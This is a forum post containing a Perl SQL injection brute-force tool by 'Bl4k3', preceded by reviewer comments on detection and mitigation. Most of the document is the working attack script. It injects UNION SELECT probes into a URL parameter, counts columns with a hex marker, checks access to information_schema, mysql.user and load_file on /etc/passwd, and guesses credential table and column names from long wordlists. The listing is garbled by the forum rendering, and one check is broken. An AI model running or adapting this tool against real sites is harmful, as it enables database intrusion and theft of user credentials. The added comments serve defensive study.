
SQL Injection-BruteForce

07-03-2012 23:17


Kodlar:

# Reviewer notes (defensive reading). The forum software mangled this listing:
# statements are collapsed onto a few long lines and stray spaces appear inside
# string literals and identifiers. It is documented as posted, not repaired.
#
# What the visible code does:
#   - Reads a target URL ending in a query parameter, a column limit and an
#     output file name from @ARGV; every request is a plain LWP::Simple get().
#   - Appends "-1", "union" and "select" to the parameter, joining the keywords
#     with either "+" (closing with "--") or "/**/" (closing with "/*").
#   - Uses the hex literal 0x6c6f67696e70776e7a (ASCII "loginpwnz") as a marker
#     and treats /loginpwnz/ in the response body as proof that the injected
#     SELECT was reflected into the page.
#   - Once a column count answers, probes information_schema.tables, mysql.user
#     and load_file() on the hex form of /etc/passwd, then optionally walks the
#     @nombretabla and @nombrecolumna wordlists.
#   - Appends the URLs that answered to the output file through the WEB handle.
#
# Detection: every probe leaves the same traces in web-server and WAF logs:
#   a parameter value starting with "-1" followed by union/select, the marker
#   hex string, references to information_schema.tables or mysql.user,
#   load_file( with a hex argument, and a burst of near-identical GET requests
#   that differ only in one table or column name.
#   NOTE(review): no User-Agent is set here, so requests presumably carry the
#   LWP default agent string -- confirm against the logs.
#
# Mitigation: bind the id parameter with prepared statements instead of string
#   concatenation; run the application under a database account without the
#   FILE privilege and without read access to the mysql schema; do not return
#   database error text to clients (the initial check keys on strings such as
#   "You have an error in your SQL syntax").
#
# Triage caveat: as posted, the initial check also tests the response against
#   / /, which any page containing a space satisfies, so a "[+] Vulnerable
#   website" line in this tool's output is not evidence of a flaw on its own.
[PHP]#!/usr/bin/perl use LWP::Simple; if(!$ARGV[2]) { print "\n\n[+] SQL Injection

bruteforce By Bl4k3

-[+]-\n========================================="; print

"\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";

print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns

to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '')

(Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n"; exit (0); } @nombretabla=('admin','tblUsers','tblAdmin','user' ,'users','username','usernames','usuario',

# Wordlists: candidate table names (@nombretabla) continue below, followed by
# candidate column names (@nombrecolumna). Several entries contain stray spaces
# introduced by the forum rendering.
'name','names','nombre','nombres','usuarios','memb er','members','admin_table', 'miembro','miembros','membername','admins','admini strator',

'administrators','passwd','password','passwords',' pass','Pass', 'tAdmin','tadmin','user_password','user_passwords' ,'user_name','user_names',

'member_password','mods','mod','moderators','moder ator','user_email', 'user_emails','user_mail','user_mails','mail','ema ils','email','address', 'e-mail','emailaddress','correo','correos','phpbb_use rs','log','logins',

'login','registers','register','usr','usrs','ps',' pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks ','manager','managers','administrador', 'tUser','tUsers','administradores','clave','login_ id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena', 'auth','key','senha', 'tb_admin','tb_administrator','tb_login','tb_logon ','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon',' logon','fazer','authorization', 'membros','utilizadores','staff','nuke_authors','a ccounts','account','accnts',

'associated','accnt','customers','customer','membr es','administrateur','utilisateur', 'tuser','tusers','utilisateurs','password','ammini stratore','god','God','authors', 'asociado','asociados','autores','membername','aut or','autores','Users','Admin','Members', 'Miembros','Usuario','Usuarios','ADMIN','USERS','U SER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEM BROS','MIEMBRO'); @nombrecolumna=('admin_name','log_utenti','cla_adm ','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorizati on','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name',' user_username','uname','user_uname','usern','user_ usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm', 'nm','user_nm','login','u_name','nombre','login_id ','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme', 'unme','psw','password','user_password','autores', 'pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword', 'passwd','user_passwd','passw','user_passw','pwrd' ,'user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena' ,'pas','sistema_password','autor','upassword','web _password','web_username'); if ( $ARGV[0] !~ /^http:/ ) { $ARGV[0] = "http://" . $ARGV[0]; } if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--") { $cmn.= "+"; $cfin.="--"; print "\n[+] Comments to use: '--' & '+'"; } else { $cmn.= "/**/"; $cfin.= "/*"; print "\n[+] Comments to use: '/*' & '/**/'"; } open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n"; if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK") { print "\n[!] Skipping the initial check...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "\n[!] 
Checking if the website is vulnerable...\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin; $response=get($sql)or die("[-] Wrong Website, check it\n"); if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/) { print "[+] Vulnerable website, script

continues...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n"; exit(1); } } print "\n[!] Looking up columns...\n"; for ($column = 0 ; $column < $ARGV[1] ; $column ++) { $union.=','.$column; $inyection.=','."0x6c6f67696e70776e7a"; if ($column == 0) { print WEB "\n[COLUMNS]:\n\n"; $inyection = ''; $union = ''; } $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cfin; $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n"); if($response =~ /loginpwnz/) { $column ++; print "[+] The site has $column columns\n\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfi n; print "$sql\n"; print WEB "$sql\n"; print "\n[!] Checking if Information_Schema exists..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cmn."from".$cmn."information_s chema.tables".$cfin; $response=get($sql)or die("[-] Impossible to get Information_Schema\n"); if($response =~ /loginpwnz/) { print "\n[+] Information_Schema available...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn ."from".$cmn."information_schema.tables".$cfin; print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n"; } else { print "\n[-] Information_Schema unavailable"; } print "\n[!] Checking if MySQL.User exists..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cmn."from".$cmn."mysql.user".$ cfin; $response=get($sql)or die("[-] Impossible to get MySQL.User\n"); if($response =~ /loginpwnz/) { print "\n[+] MySQL.User available...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn ."from".$cmn."mysql.user".$cfin; print WEB "\n\n[MYSQL.USER]:\n\n$sql\n"; } else { print "\n[-] MySQL.User unavailable"; } while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764 )'; $loadcont++; } print "\n[!] 
Checking if it is possible to inject LOAD_FILE..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f 6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n"); if($response =~

# The /root:x:/ test below looks for /etc/passwd content returned through
# load_file(); a database account without the FILE privilege makes this probe
# come back empty.
/root:x:/) { print "\n[+] LOAD_FILE available...saving in $ARGV[2]"; print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n"; } else { print "\n[-] LOAD_FILE unavailable"; } if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T") { print "\n\n[!] Brute forcing tables..."; print WEB "\n\n[TABLES]:\n\n"; foreach $tabla(@nombretabla) { chomp($tabla); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get tables\n"); if($response =~ /loginpwnz/) { print "\n[+] Table $tabla exists...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn ."from".$cmn.$tabla.$cfin; print WEB "$sql\n"; } } } if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C") { print "\n\n[!] Table to brute force columns: "; $tabla.=''; chomp($tabla); print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n"; foreach $columna(@nombrecolumna) { chomp($columna); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f6 7696e70776e7a,0x3a,$columna)".$inyection.$cmn."fro m".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get columns\n"); if ($response =~ /loginpwnz/) { print "\n[+] Column $columna available...saving in $ARGV[2]"; print WEB "$columna\n"; } } } print WEB "\n\n\n[*EOF*]"; print "\n\n[+] Everything saved

correctly in $ARGV[2]\n\n"; print "## c0ded by Bl4k3 | 2010 ##\n\n"; exit (0); } } print "[-] Impossible to find number of columns, try more columns\n\n"; print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n"; exit (0); [/PHP]